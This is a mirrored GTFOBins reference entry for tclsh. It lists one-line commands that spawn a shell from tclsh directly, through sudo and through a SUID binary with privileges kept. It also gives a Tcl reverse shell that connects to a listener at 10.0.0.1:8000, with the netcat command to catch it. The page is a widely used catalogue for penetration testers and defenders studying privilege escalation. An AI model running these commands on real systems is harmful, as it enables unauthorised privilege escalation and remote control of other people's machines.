1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/tclsh.md
2018-05-23 08:06:50 +01:00

701 B

functions
exec-interactive sudo-enabled suid-enabled reverse-shell-non-interactive
code
tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
code
sudo tclsh exec /bin/sh <@stdin >@stdout 2>@stderr
code
./tclsh exec /bin/sh -p <@stdin >@stdout 2>@stderr
description code
Run `nc -l -p 8000` to receive the shell on the other end. export RHOST=10.0.0.1 export RPORT=8000 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh